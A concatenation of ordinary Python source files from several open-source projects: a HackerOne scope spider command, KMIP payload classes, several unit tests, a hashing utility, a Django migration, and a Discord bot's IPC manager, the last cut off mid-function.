self.subjects_borrowed = response['subjects_borrowed'] if 'subjects_returned' in response: self.subjects_returned = response['subjects_returned']
web/vultargetspider/management/commands/HackeroneSpider.py
laozhudetui/LSpider
311
12729917
<reponame>laozhudetui/LSpider<filename>web/vultargetspider/management/commands/HackeroneSpider.py #!/usr/bin/env python # encoding: utf-8 ''' @author: LoRexxar @contact: <EMAIL> @file: HackeroneSpider.py @time: 2020/4/22 15:05 @desc: ''' from django.core.management.base import BaseCommand from web.vultargetspider.controller.hackerone import HackeroneSpider from utils.log import logger import sys import traceback class Command(BaseCommand): help = 'spider for hackerone' def add_arguments(self, parser): # Positional arguments parser.add_argument('appname', type=str) def handle(self, *args, **options): try: if 'appname' not in options: logger.error('[Hackerone Spider] no appname input.') sys.exit(0) logger.info("[Hackerone Spider] Hackerone {} Scope spider start.".format(options['appname'])) h = HackeroneSpider() result_list = h.spider(options['appname']) for result in result_list: print(result) except KeyboardInterrupt: logger.warn("[Spider] stop monitor.") sys.exit(0) except: logger.error("[Spider] something error, {}".format(traceback.format_exc()))
kmip/core/messages/payloads/delete_attribute.py
ondrap/PyKMIP
179
12729938
# Copyright (c) 2019 The Johns Hopkins University/Applied Physics Laboratory # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import six from kmip.core import enums from kmip.core import exceptions from kmip.core import objects from kmip.core import primitives from kmip.core import utils from kmip.core.messages.payloads import base class DeleteAttributeRequestPayload(base.RequestPayload): """ A request payload for the DeleteAttribute operation. Attributes: unique_identifier: The unique ID of the object on which attribute deletion should be performed. attribute_name: The name of the attribute to be deleted. Used in KMIP 1.0 - 1.4. attribute_index: The index of the attribute to be deleted. Used in KMIP 1.0 - 1.4. current_attribute: The attribute to be deleted. Used in KMIP 2.0+. attribute_reference: The reference to the attribute to be deleted. Used in KMIP 2.0+. """ def __init__(self, unique_identifier=None, attribute_name=None, attribute_index=None, current_attribute=None, attribute_reference=None): """ Construct a DeleteAttribute request payload. Args: unique_identifier (string): The unique ID of the object on which attribute deletion should be performed. Optional, defaults to None. attribute_name (string): The name of the attribute to be deleted. Used in KMIP 1.0 - 1.4. Defaults to None. Required for read/write. attribute_index (int): The index of the attribute to be deleted. Used in KMIP 1.0 - 1.4. Optional, defaults to None. current_attribute (struct): A CurrentAttribute structure containing the attribute to be deleted. Used in KMIP 2.0+. Optional, defaults to None. Must be specified if the attribute reference is not provided. attribute_reference (struct): An AttributeReference structure containing a reference to the attribute to be deleted. Used in KMIP 2.0+. Optional, defaults to None. Must be specified if the current attribute is not specified. """ super(DeleteAttributeRequestPayload, self).__init__() self._unique_identifier = None self._attribute_name = None self._attribute_index = None self._current_attribute = None self._attribute_reference = None self.unique_identifier = unique_identifier self.attribute_name = attribute_name self.attribute_index = attribute_index self.current_attribute = current_attribute self.attribute_reference = attribute_reference @property def unique_identifier(self): if self._unique_identifier: return self._unique_identifier.value return None @unique_identifier.setter def unique_identifier(self, value): if value is None: self._unique_identifier = None elif isinstance(value, six.string_types): self._unique_identifier = primitives.TextString( value=value, tag=enums.Tags.UNIQUE_IDENTIFIER ) else: raise TypeError("The unique identifier must be a string.") @property def attribute_name(self): if self._attribute_name: return self._attribute_name.value return None @attribute_name.setter def attribute_name(self, value): if value is None: self._attribute_name = None elif isinstance(value, six.string_types): self._attribute_name = primitives.TextString( value=value, tag=enums.Tags.ATTRIBUTE_NAME ) else: raise TypeError("The attribute name must be a string.") @property def attribute_index(self): if self._attribute_index: return self._attribute_index.value return None @attribute_index.setter def attribute_index(self, value): if value is None: self._attribute_index = None elif isinstance(value, six.integer_types): self._attribute_index = primitives.Integer( value=value, tag=enums.Tags.ATTRIBUTE_INDEX ) else: raise TypeError("The attribute index must be an integer.") @property def current_attribute(self): if self._current_attribute: return self._current_attribute return None @current_attribute.setter def current_attribute(self, value): if value is None: self._current_attribute = None elif isinstance(value, objects.CurrentAttribute): self._current_attribute = value else: raise TypeError( "The current attribute must be a CurrentAttribute object." ) @property def attribute_reference(self): if self._attribute_reference: return self._attribute_reference return None @attribute_reference.setter def attribute_reference(self, value): if value is None: self._attribute_reference = None elif isinstance(value, objects.AttributeReference): self._attribute_reference = value else: raise TypeError( "The attribute reference must be an AttributeReference object." ) def read(self, input_buffer, kmip_version=enums.KMIPVersion.KMIP_1_0): """ Read the data encoding the DeleteAttribute request payload and decode it into its constituent part. Args: input_buffer (stream): A data stream containing encoded object data, supporting a read method; usually a BytearrayStream object. kmip_version (KMIPVersion): An enumeration defining the KMIP version with which the object will be decoded. Optional, defaults to KMIP 1.0. Raises: InvalidKmipEncoding: Raised if fields are missing from the encoding. """ super(DeleteAttributeRequestPayload, self).read( input_buffer, kmip_version=kmip_version ) local_buffer = utils.BytearrayStream(input_buffer.read(self.length)) if self.is_tag_next(enums.Tags.UNIQUE_IDENTIFIER, local_buffer): self._unique_identifier = primitives.TextString( tag=enums.Tags.UNIQUE_IDENTIFIER ) self._unique_identifier.read( local_buffer, kmip_version=kmip_version ) else: self._unique_identifier = None if kmip_version < enums.KMIPVersion.KMIP_2_0: if self.is_tag_next(enums.Tags.ATTRIBUTE_NAME, local_buffer): self._attribute_name = primitives.TextString( tag=enums.Tags.ATTRIBUTE_NAME ) self._attribute_name.read( local_buffer, kmip_version=kmip_version ) else: raise exceptions.InvalidKmipEncoding( "The DeleteAttribute request payload encoding is missing " "the attribute name field." ) if self.is_tag_next(enums.Tags.ATTRIBUTE_INDEX, local_buffer): self._attribute_index = primitives.Integer( tag=enums.Tags.ATTRIBUTE_INDEX ) self._attribute_index.read( local_buffer, kmip_version=kmip_version ) else: self._attribute_index = None else: if self.is_tag_next(enums.Tags.CURRENT_ATTRIBUTE, local_buffer): self._current_attribute = objects.CurrentAttribute() self._current_attribute.read( local_buffer, kmip_version=kmip_version ) else: self._current_attribute = None if self.is_tag_next(enums.Tags.ATTRIBUTE_REFERENCE, local_buffer): self._attribute_reference = objects.AttributeReference() self._attribute_reference.read( local_buffer, kmip_version=kmip_version ) else: self._attribute_reference = None if self._current_attribute == self._attribute_reference: raise exceptions.InvalidKmipEncoding( "The DeleteAttribute encoding is missing either the " "current attribute or the attribute reference field." ) self.is_oversized(local_buffer) def write(self, output_buffer, kmip_version=enums.KMIPVersion.KMIP_1_0): """ Write the data encoding the DeleteAttribute request payload to a stream. Args: output_buffer (stream): A data stream in which to encode object data, supporting a write method; usually a BytearrayStream object. kmip_version (KMIPVersion): An enumeration defining the KMIP version with which the object will be encoded. Optional, defaults to KMIP 1.0. Raises: InvalidField """ local_buffer = utils.BytearrayStream() if self._unique_identifier: self._unique_identifier.write( local_buffer, kmip_version=kmip_version ) if kmip_version < enums.KMIPVersion.KMIP_2_0: if self._attribute_name: self._attribute_name.write( local_buffer, kmip_version=kmip_version ) else: raise exceptions.InvalidField( "The DeleteAttribute request payload is missing the " "attribute name field." ) if self._attribute_index: self._attribute_index.write( local_buffer, kmip_version=kmip_version ) else: if self._current_attribute == self._attribute_reference: raise exceptions.InvalidField( "The DeleteAttribute request payload is missing either " "the current attribute or the attribute reference field." ) if self._current_attribute: self._current_attribute.write( local_buffer, kmip_version=kmip_version ) if self._attribute_reference: self._attribute_reference.write( local_buffer, kmip_version=kmip_version ) self.length = local_buffer.length() super(DeleteAttributeRequestPayload, self).write( output_buffer, kmip_version=kmip_version ) output_buffer.write(local_buffer.buffer) def __repr__(self): args = [ "unique_identifier='{}'".format(self.unique_identifier), "attribute_name='{}'".format(self.attribute_name), "attribute_index={}".format(self.attribute_index), "current_attribute={}".format(repr( self.current_attribute ) if self.current_attribute else None), "attribute_reference={}".format(repr( self.attribute_reference ) if self.attribute_reference else None) ] return "DeleteAttributeRequestPayload({})".format(", ".join(args)) def __str__(self): return str( { "unique_identifier": self.unique_identifier, "attribute_name": self.attribute_name, "attribute_index": self.attribute_index, "current_attribute": str( self.current_attribute ) if self.current_attribute else None, "attribute_reference": str( self.attribute_reference ) if self.attribute_reference else None } ) def __eq__(self, other): if isinstance(other, DeleteAttributeRequestPayload): if self.unique_identifier != other.unique_identifier: return False elif self.attribute_name != other.attribute_name: return False elif self.attribute_index != other.attribute_index: return False elif self.current_attribute != other.current_attribute: return False elif self.attribute_reference != other.attribute_reference: return False else: return True else: return NotImplemented def __ne__(self, other): if isinstance(other, DeleteAttributeRequestPayload): return not self.__eq__(other) else: return NotImplemented class DeleteAttributeResponsePayload(base.ResponsePayload): """ A response payload for the DeleteAttribute operation. Attributes: unique_identifier: The unique ID of the object on which attribute deletion was performed. Optional, defaults to None. attribute: The attribute object deleted from the managed object. Used in KMIP 1.0 - 1.4. """ def __init__(self, unique_identifier=None, attribute=None): """ Construct a DeleteAttribute response payload. Args: unique_identifier (string): The unique ID of the object on which attribute deletion was performed. Defaults to None. Required for read/write. attribute (struct): An Attribute object containing the attribute that was deleted. Used in KMIP 1.0 - 1.4. Defaults to None. Required for read/write. """ super(DeleteAttributeResponsePayload, self).__init__() self._unique_identifier = None self._attribute = None self.unique_identifier = unique_identifier self.attribute = attribute @property def unique_identifier(self): if self._unique_identifier: return self._unique_identifier.value return None @unique_identifier.setter def unique_identifier(self, value): if value is None: self._unique_identifier = None elif isinstance(value, six.string_types): self._unique_identifier = primitives.TextString( value=value, tag=enums.Tags.UNIQUE_IDENTIFIER ) else: raise TypeError("The unique identifier must be a string.") @property def attribute(self): if self._attribute: return self._attribute return None @attribute.setter def attribute(self, value): if value is None: self._attribute = None elif isinstance(value, objects.Attribute): self._attribute = value else: raise TypeError( "The attribute must be an Attribute object." ) def read(self, input_buffer, kmip_version=enums.KMIPVersion.KMIP_1_0): """ Read the data encoding the DeleteAttribute response payload and decode it into its constituent parts. Args: input_buffer (stream): A data stream containing encoded object data, supporting a read method; usually a BytearrayStream object. kmip_version (enum): A KMIPVersion enumeration defining the KMIP version with which the object will be decoded. Optional, defaults to KMIP 1.0. Raises: InvalidKmipEncoding: Raised if any required fields are missing from the encoding. """ super(DeleteAttributeResponsePayload, self).read( input_buffer, kmip_version=kmip_version ) local_buffer = utils.BytearrayStream(input_buffer.read(self.length)) if self.is_tag_next(enums.Tags.UNIQUE_IDENTIFIER, local_buffer): self._unique_identifier = primitives.TextString( tag=enums.Tags.UNIQUE_IDENTIFIER ) self._unique_identifier.read( local_buffer, kmip_version=kmip_version ) else: raise exceptions.InvalidKmipEncoding( "The DeleteAttribute response payload encoding is missing the " "unique identifier field." ) if kmip_version < enums.KMIPVersion.KMIP_2_0: if self.is_tag_next(enums.Tags.ATTRIBUTE, local_buffer): self._attribute = objects.Attribute() self._attribute.read(local_buffer, kmip_version=kmip_version) else: raise exceptions.InvalidKmipEncoding( "The DeleteAttribute response payload encoding is missing " "the attribute field." ) self.is_oversized(local_buffer) def write(self, output_buffer, kmip_version=enums.KMIPVersion.KMIP_1_0): """ Write the data encoding the DeleteAttribute response payload to a buffer. Args: output_buffer (buffer): A data buffer in which to encode object data, supporting a write method; usually a BytearrayStream object. kmip_version (enum): A KMIPVersion enumeration defining the KMIP version with which the object will be encoded. Optional, defaults to KMIP 1.0. Raises: InvalidField: Raised if a required field is missing from the payload object. """ local_buffer = utils.BytearrayStream() if self._unique_identifier: self._unique_identifier.write( local_buffer, kmip_version=kmip_version ) else: raise exceptions.InvalidField( "The DeleteAttribute response payload is missing the unique " "identifier field." ) if kmip_version < enums.KMIPVersion.KMIP_2_0: if self._attribute: self._attribute.write( local_buffer, kmip_version=kmip_version ) else: raise exceptions.InvalidField( "The DeleteAttribute response payload is missing the " "attribute field." ) self.length = local_buffer.length() super(DeleteAttributeResponsePayload, self).write( output_buffer, kmip_version=kmip_version ) output_buffer.write(local_buffer.buffer) def __repr__(self): args = [ "unique_identifier='{}'".format(self.unique_identifier), "attribute={}".format(repr(self.attribute)) ] return "DeleteAttributeResponsePayload({})".format(", ".join(args)) def __str__(self): return str( { "unique_identifier": self.unique_identifier, "attribute": str(self.attribute) } ) def __eq__(self, other): if isinstance(other, DeleteAttributeResponsePayload): if self.unique_identifier != other.unique_identifier: return False elif self.attribute != other.attribute: return False else: return True return NotImplemented def __ne__(self, other): if isinstance(other, DeleteAttributeResponsePayload): return not self.__eq__(other) return NotImplemented
h2o-hadoop-common/tests/python/pyunit_gcs_import.py
kernelrich/h2o-3
6,098
12729987
#! /usr/env/python import sys import os sys.path.insert(1, os.path.join("../../../h2o-py")) from tests import pyunit_utils import h2o def gcs_import(): # Just test the import works - no class clashes, no exception keys = h2o.import_file( "gs://gcp-public-data-nexrad-l2/2018/01/01/KABR/NWS_NEXRAD_NXL2DPBL_KABR_20180101050000_20180101055959.tar", parse=False) assert len(keys) == 1 assert keys == [ 'gs://gcp-public-data-nexrad-l2/2018/01/01/KABR/NWS_NEXRAD_NXL2DPBL_KABR_20180101050000_20180101055959.tar'] expected_keys = [ 'gs://gcp-public-data-nexrad-l2/1991/06/05/KTLX/NWS_NEXRAD_NXL2LG_KTLX_19910605160000_19910605235959.tar', 'gs://gcp-public-data-nexrad-l2/1991/06/06/KTLX/NWS_NEXRAD_NXL2LG_KTLX_19910606000000_19910606075959.tar', 'gs://gcp-public-data-nexrad-l2/1991/06/06/KTLX/NWS_NEXRAD_NXL2LG_KTLX_19910606080000_19910606155959.tar', 'gs://gcp-public-data-nexrad-l2/1991/06/06/KTLX/NWS_NEXRAD_NXL2LG_KTLX_19910606160000_19910606235959.tar', 'gs://gcp-public-data-nexrad-l2/1991/06/07/KTLX/NWS_NEXRAD_NXL2LG_KTLX_19910607160000_19910607235959.tar', 'gs://gcp-public-data-nexrad-l2/1991/06/08/KTLX/NWS_NEXRAD_NXL2LG_KTLX_19910608000000_19910608075959.tar', 'gs://gcp-public-data-nexrad-l2/1991/06/08/KTLX/NWS_NEXRAD_NXL2LG_KTLX_19910608080000_19910608155959.tar', 'gs://gcp-public-data-nexrad-l2/1991/06/09/KTLX/NWS_NEXRAD_NXL2LG_KTLX_19910609160000_19910609235959.tar', 'gs://gcp-public-data-nexrad-l2/1991/06/10/KTLX/NWS_NEXRAD_NXL2LG_KTLX_19910610000000_19910610075959.tar', 'gs://gcp-public-data-nexrad-l2/1991/06/10/KTLX/NWS_NEXRAD_NXL2LG_KTLX_19910610080000_19910610155959.tar', 'gs://gcp-public-data-nexrad-l2/1991/06/22/KTLX/NWS_NEXRAD_NXL2LG_KTLX_19910622160000_19910622235959.tar', 'gs://gcp-public-data-nexrad-l2/1991/06/23/KTLX/NWS_NEXRAD_NXL2LG_KTLX_19910623000000_19910623075959.tar'] # Import folder keys = h2o.import_file("gs://gcp-public-data-nexrad-l2/1991/06", parse=False) assert len(keys) == 12 assert keys == expected_keys # Import folder - slash at the end of path keys = h2o.import_file("gs://gcp-public-data-nexrad-l2/1991/06/", parse=False) assert len(keys) == 12 assert keys == expected_keys # Import folder - Invalid path keys = h2o.import_file("gs://gcp-public-data-nexrad-l2/1991/06/somethingNonExistent/", parse=False) assert len(keys) == 0 if __name__ == "__main__": pyunit_utils.standalone_test(gcs_import) else: gcs_import()
koku/masu/util/hash.py
rubik-ai/koku
157
12730014
<filename>koku/masu/util/hash.py # # Copyright 2021 Red Hat Inc. # SPDX-License-Identifier: Apache-2.0 # """Hashing utility.""" import hashlib from masu.exceptions import HasherError class Hasher: """A utility class to create hashes.""" def __init__(self, hash_function, length=None, encoding="utf-8"): """Initialize the Hasher. Args: hash_function (str): String representation of hash function Ex. 'md5' length (int): The digest length for SHAKE algorithms encoding (str): Encoding used to convert string to bytes Returns: (Hasher): the initialized Hasher """ self.length = length self.hash_function = hash_function self.encoding = encoding def get_hash_function(self): """Get the hash function.""" return self._hash_function def set_hash_function(self, hash_function): """Set the hash function used. Args: hash_function (str): String representation of hash function Ex. 'md5' Returns: (hashlib hash function) """ if "shake" in hash_function and not self.length: errmsg = f"{hash_function} requires length to be set" raise HasherError(errmsg) self._hash_function = getattr(hashlib, hash_function, None) if not self._hash_function: errmsg = f"{hash_function} is not currently supported." if hash_function in hashlib.algorithms_guaranteed: errmsg = f"{hash_function} needs Hasher implementation." raise HasherError(errmsg) def hash_string_to_hex(self, string): """Return a hex digest of the hashed string. Args: string (str): The string to be hashed Returns: (str): The hex string of the hash """ if self.length: return self.hash_function(string.encode(self.encoding)).hexdigest(self.length) return self.hash_function(string.encode(self.encoding)).hexdigest() hash_function = property(get_hash_function, set_hash_function)
dialogue-engine/test/programytest/storage/stores/sql/dao/test_node.py
cotobadesign/cotoba-agent-oss
104
12730018
<reponame>cotobadesign/cotoba-agent-oss<gh_stars>100-1000 """ Copyright (c) 2020 COTOBA DESIGN, Inc. Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ import unittest from programy.storage.stores.sql.dao.node import PatternNode from programy.storage.stores.sql.dao.node import TemplateNode class PatternNodeTests(unittest.TestCase): def test_init(self): node1 = PatternNode(name='name', node_class='class') self.assertIsNotNone(node1) self.assertEqual("<Pattern Node(id='n/a', name='name', node_class='class')>", str(node1)) node2 = PatternNode(id=1, name='name', node_class='class') self.assertIsNotNone(node2) self.assertEqual("<Pattern Node(id='1', name='name', node_class='class')>", str(node2)) class TemplateNodeTests(unittest.TestCase): def test_init(self): node1 = TemplateNode(name='name', node_class='class') self.assertIsNotNone(node1) self.assertEqual("<Template Node(id='n/a', name='name', node_class='class')>", str(node1)) node2 = TemplateNode(id=1, name='name', node_class='class') self.assertIsNotNone(node2) self.assertEqual("<Template Node(id='1', name='name', node_class='class')>", str(node2))
InvenTree/build/migrations/0030_alter_build_reference.py
carlos-riquelme/InvenTree
656
12730024
<reponame>carlos-riquelme/InvenTree<filename>InvenTree/build/migrations/0030_alter_build_reference.py # Generated by Django 3.2.4 on 2021-07-08 14:14 import InvenTree.validators import build.models from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('build', '0029_auto_20210601_1525'), ] operations = [ migrations.AlterField( model_name='build', name='reference', field=models.CharField(default=build.models.get_next_build_number, help_text='Build Order Reference', max_length=64, unique=True, validators=[InvenTree.validators.validate_build_order_reference], verbose_name='Reference'), ), ]
test/hummingbot/connector/derivative/binance_perpetual/test_binance_perpetual_web_utils.py
pecuniafinance/hummingbot
542
12730050
<reponame>pecuniafinance/hummingbot import asyncio import unittest from typing import Awaitable import hummingbot.connector.derivative.binance_perpetual.binance_perpetual_web_utils as web_utils import hummingbot.connector.derivative.binance_perpetual.constants as CONSTANTS from hummingbot.connector.derivative.binance_perpetual.binance_perpetual_web_utils import ( BinancePerpetualRESTPreProcessor, ) from hummingbot.connector.time_synchronizer import TimeSynchronizer from hummingbot.core.web_assistant.connections.data_types import RESTMethod, RESTRequest from hummingbot.core.web_assistant.web_assistants_factory import WebAssistantsFactory class BinancePerpetualWebUtilsUnitTests(unittest.TestCase): @classmethod def setUpClass(cls) -> None: super().setUpClass() cls.ev_loop = asyncio.get_event_loop() cls.pre_processor = BinancePerpetualRESTPreProcessor() def async_run_with_timeout(self, coroutine: Awaitable, timeout: float = 1): ret = self.ev_loop.run_until_complete(asyncio.wait_for(coroutine, timeout)) return ret def test_binance_perpetual_rest_pre_processor_non_post_request(self): request: RESTRequest = RESTRequest( method=RESTMethod.GET, url="/TEST_URL", ) result_request: RESTRequest = self.async_run_with_timeout(self.pre_processor.pre_process(request)) self.assertIn("Content-Type", result_request.headers) self.assertEqual(result_request.headers["Content-Type"], "application/x-www-form-urlencoded") def test_binance_perpetual_rest_pre_processor_post_request(self): request: RESTRequest = RESTRequest( method=RESTMethod.POST, url="/TEST_URL", ) result_request: RESTRequest = self.async_run_with_timeout(self.pre_processor.pre_process(request)) self.assertIn("Content-Type", result_request.headers) self.assertEqual(result_request.headers["Content-Type"], "application/json") def test_rest_url_main_domain(self): path_url = "/TEST_PATH_URL" expected_url = f"{CONSTANTS.PERPETUAL_BASE_URL}{CONSTANTS.API_VERSION_V2}{path_url}" self.assertEqual(expected_url, web_utils.rest_url(path_url, api_version=CONSTANTS.API_VERSION_V2)) self.assertEqual(expected_url, web_utils.rest_url(path_url, api_version=CONSTANTS.API_VERSION_V2)) def test_rest_url_testnet_domain(self): path_url = "/TEST_PATH_URL" expected_url = f"{CONSTANTS.TESTNET_BASE_URL}{CONSTANTS.API_VERSION_V2}{path_url}" self.assertEqual( expected_url, web_utils.rest_url(path_url=path_url, domain="testnet", api_version=CONSTANTS.API_VERSION_V2) ) def test_wss_url_main_domain(self): endpoint = "TEST_SUBSCRIBE" expected_url = f"{CONSTANTS.PERPETUAL_WS_URL}{endpoint}" self.assertEqual(expected_url, web_utils.wss_url(endpoint=endpoint)) def test_wss_url_testnet_domain(self): endpoint = "TEST_SUBSCRIBE" expected_url = f"{CONSTANTS.TESTNET_WS_URL}{endpoint}" self.assertEqual(expected_url, web_utils.wss_url(endpoint=endpoint, domain="testnet")) def test_build_api_factory(self): api_factory = web_utils.build_api_factory( time_synchronizer=TimeSynchronizer(), time_provider=lambda: None, ) self.assertIsInstance(api_factory, WebAssistantsFactory) self.assertIsNone(api_factory._auth) self.assertTrue(2, len(api_factory._rest_pre_processors))
tests/pyccel/project_rel_imports/runtest.py
dina-fouad/pyccel
206
12730065
# pylint: disable=missing-function-docstring, missing-module-docstring/ from project.folder2.mod3 import one_hundred_plus_sum_to_n_squared if __name__ == '__main__': print(one_hundred_plus_sum_to_n_squared(4))
villager-bot/karen.py
Villager-Dev/Villager-Bot
122
12730101
from concurrent.futures import ProcessPoolExecutor from collections import defaultdict from classyjson import ClassyDict import asyncio import asyncpg import psutil import arrow from util.ipc import Server, PacketType, PacketHandlerRegistry, handle_packet from util.setup import load_secrets, load_data, setup_karen_logging from util.cooldowns import CooldownManager, MaxConcurrencyManager from util.code import execute_code, format_exception from util.misc import MultiLock from bot import run_cluster class MechaKaren(PacketHandlerRegistry): class Share: def __init__(self): self.start_time = arrow.utcnow() self.mine_commands = defaultdict(int) # {user_id: command_count}, also used for fishing btw self.trivia_commands = defaultdict(int) # {user_id: trivia_command_count} self.active_effects = defaultdict(set) # {user_id: [effect, potion, effect,..]} self.pillages = defaultdict(int) # {user_id: num_successful_pillages} self.econ_paused_users = {} # {user_id: time.time()} def __init__(self): self.k = load_secrets() self.d = load_data() self.v = self.Share() self.logger = setup_karen_logging() self.db = None self.cooldowns = CooldownManager(self.d.cooldown_rates) self.concurrency = MaxConcurrencyManager() self.pillage_lock = MultiLock() self.server = Server(self.k.manager.host, self.k.manager.port, self.k.manager.auth, self.get_packet_handlers()) self.shard_ids = tuple(range(self.k.shard_count)) self.online_shards = set() self.eval_env = {"karen": self, **self.v.__dict__} self.broadcasts = {} # {broadcast_id: {ready: asyncio.Event, responses: [response, response,..]}} self.dm_messages = {} # {user_id: {event: asyncio.Event, content: "contents of message"}} self.current_id = 0 self.commands = defaultdict(int) self.commands_lock = asyncio.Lock() self.commands_task = None self.heal_users_task = None self.clear_trivia_commands_task = None self.reminders_task = None @handle_packet(PacketType.MISSING_PACKET) async def handle_missing_packet(self, packet: ClassyDict): try: packet_type = PacketType(packet.get("type")) except ValueError: packet_type = packet.get("type") self.logger.error(f"Missing packet handler for packet type {packet_type}") @handle_packet(PacketType.SHARD_READY) async def handle_shard_ready_packet(self, packet: ClassyDict): self.online_shards.add(packet.shard_id) if len(self.online_shards) == len(self.shard_ids): self.logger.info(f"\u001b[36;1mALL SHARDS\u001b[0m [0-{len(self.online_shards)-1}] \u001b[36;1mREADY\u001b[0m") @handle_packet(PacketType.SHARD_DISCONNECT) async def handle_shard_disconnect_packet(self, packet: ClassyDict): self.online_shards.discard(packet.shard_id) @handle_packet(PacketType.EVAL) async def handle_eval_packet(self, packet: ClassyDict): try: result = eval(packet.code, self.eval_env) success = True except Exception as e: result = format_exception(e) success = False self.logger.error(result) return {"type": PacketType.EVAL_RESPONSE, "result": result, "success": success} @handle_packet(PacketType.EXEC) async def handle_exec_packet(self, packet: ClassyDict): try: result = await execute_code(packet.code, self.eval_env) success = True except Exception as e: result = format_exception(e) success = False self.logger.error(result) return {"type": PacketType.EXEC_RESPONSE, "result": result, "success": success} @handle_packet(PacketType.BROADCAST_REQUEST) async def handle_broadcast_request_packet(self, packet: ClassyDict): """broadcasts the packet to every connection including the broadcaster, and waits for responses""" broadcast_id = f"b{self.current_id}" self.current_id += 1 broadcast_packet = {**packet.packet, "id": broadcast_id} broadcast_coros = [s.write_packet(broadcast_packet) for s in self.server.connections] broadcast = self.broadcasts[broadcast_id] = { "ready": asyncio.Event(), "responses": [], "expects": len(broadcast_coros), } await asyncio.wait(broadcast_coros) await broadcast["ready"].wait() return {"type": PacketType.BROADCAST_RESPONSE, "responses": broadcast["responses"]} @handle_packet(PacketType.BROADCAST_RESPONSE) async def handle_broadcast_response_packet(self, packet: ClassyDict): broadcast = self.broadcasts[packet.id] broadcast["responses"].append(packet) if len(broadcast["responses"]) == broadcast["expects"]: broadcast["ready"].set() @handle_packet(PacketType.COOLDOWN) async def handle_cooldown_packet(self, packet: ClassyDict): cooldown_info = self.cooldowns.check(packet.command, packet.user_id) return {"type": PacketType.COOLDOWN_RESPONSE, **cooldown_info} @handle_packet(PacketType.COOLDOWN_ADD) async def handle_cooldown_add_packet(self, packet: ClassyDict): self.cooldowns.add_cooldown(packet.command, packet.user_id) @handle_packet(PacketType.COOLDOWN_RESET) async def handle_cooldown_reset_packet(self, packet: ClassyDict): self.cooldowns.clear_cooldown(packet.command, packet.user_id) @handle_packet(PacketType.DM_MESSAGE_REQUEST) async def handle_dm_message_request_packet(self, packet: ClassyDict): entry = self.dm_messages[packet.user_id] = {"event": asyncio.Event(), "content": None} await entry["event"].wait() self.dm_messages.pop(packet.user_id, None) return {"type": PacketType.DM_MESSAGE, "content": entry["content"]} @handle_packet(PacketType.DM_MESSAGE) async def handle_dm_message_packet(self, packet: ClassyDict): entry = self.dm_messages.get(packet.user_id) if entry is None: return entry["content"] = packet.content entry["event"].set() @handle_packet(PacketType.MINE_COMMAND) async def handle_mine_command_packet(self, packet: ClassyDict): # used for fishing too self.v.mine_commands[packet.user_id] += packet.addition return {"type": PacketType.MINE_COMMAND_RESPONSE, "current": self.v.mine_commands[packet.user_id]} @handle_packet(PacketType.MINE_COMMANDS_RESET) async def handle_mine_commands_reset_packet(self, packet: ClassyDict): self.v.mine_commands[packet.user] = 0 @handle_packet(PacketType.CONCURRENCY_CHECK) async def handle_concurrency_check_packet(self, packet: ClassyDict): return { "type": PacketType.CONCURRENCY_CHECK_RESPONSE, "can_run": self.concurrency.check(packet.command, packet.user_id), } @handle_packet(PacketType.CONCURRENCY_ACQUIRE) async def handle_concurrency_acquire_packet(self, packet: ClassyDict): self.concurrency.acquire(packet.command, packet.user_id) @handle_packet(PacketType.CONCURRENCY_RELEASE) async def handle_concurrency_release_packet(self, packet: ClassyDict): self.concurrency.release(packet.command, packet.user_id) @handle_packet(PacketType.COMMAND_RAN) async def handle_command_ran_packet(self, packet: ClassyDict): async with self.commands_lock: self.commands[packet.user_id] += 1 @handle_packet(PacketType.ACQUIRE_PILLAGE_LOCK) async def handle_acquire_pillage_lock_packet(self, packet: ClassyDict): await self.pillage_lock.acquire(packet.user_ids) return {} @handle_packet(PacketType.RELEASE_PILLAGE_LOCK) async def handle_release_pillage_lock_packet(self, packet: ClassyDict): self.pillage_lock.release(packet.user_ids) @handle_packet(PacketType.PILLAGE) async def handle_pillage_packet(self, packet: ClassyDict): self.v.pillages[packet.pillager] += 1 return {"pillager": self.v.pillages[packet.pillager] - 1, "victim": self.v.pillages[packet.victim] - 1} @handle_packet(PacketType.FETCH_STATS) async def handle_fetch_stats_packet(self, packet: ClassyDict): proc = psutil.Process() with proc.oneshot(): mem_usage = proc.memory_full_info().uss threads = proc.num_threads() return {"type": PacketType.STATS_RESPONSE, "stats": [mem_usage, threads, len(asyncio.all_tasks())] + [0] * 7} @handle_packet(PacketType.TRIVIA) async def handle_trivia_packet(self, packet: ClassyDict): self.v.trivia_commands[packet.author] += 1 return {"do_reward": self.v.trivia_commands[packet.author] < 5} async def commands_dump_loop(self): try: while True: await asyncio.sleep(60) if self.commands: async with self.commands_lock: commands_dump = list(self.commands.items()) user_ids = [(user_id,) for user_id in list(self.commands.keys())] self.commands.clear() await self.db.executemany( 'INSERT INTO users (user_id) VALUES ($1) ON CONFLICT ("user_id") DO NOTHING', user_ids ) # ensure users are in the database first await self.db.executemany( 'INSERT INTO leaderboards (user_id, commands) VALUES ($1, $2) ON CONFLICT ("user_id") DO UPDATE SET "commands" = leaderboards.commands + $2 WHERE leaderboards.user_id = $1', commands_dump, ) except Exception as e: self.logger.error(format_exception(e)) async def heal_users_loop(self): while True: await asyncio.sleep(32) try: await self.db.execute("UPDATE users SET health = health + 1 WHERE health < 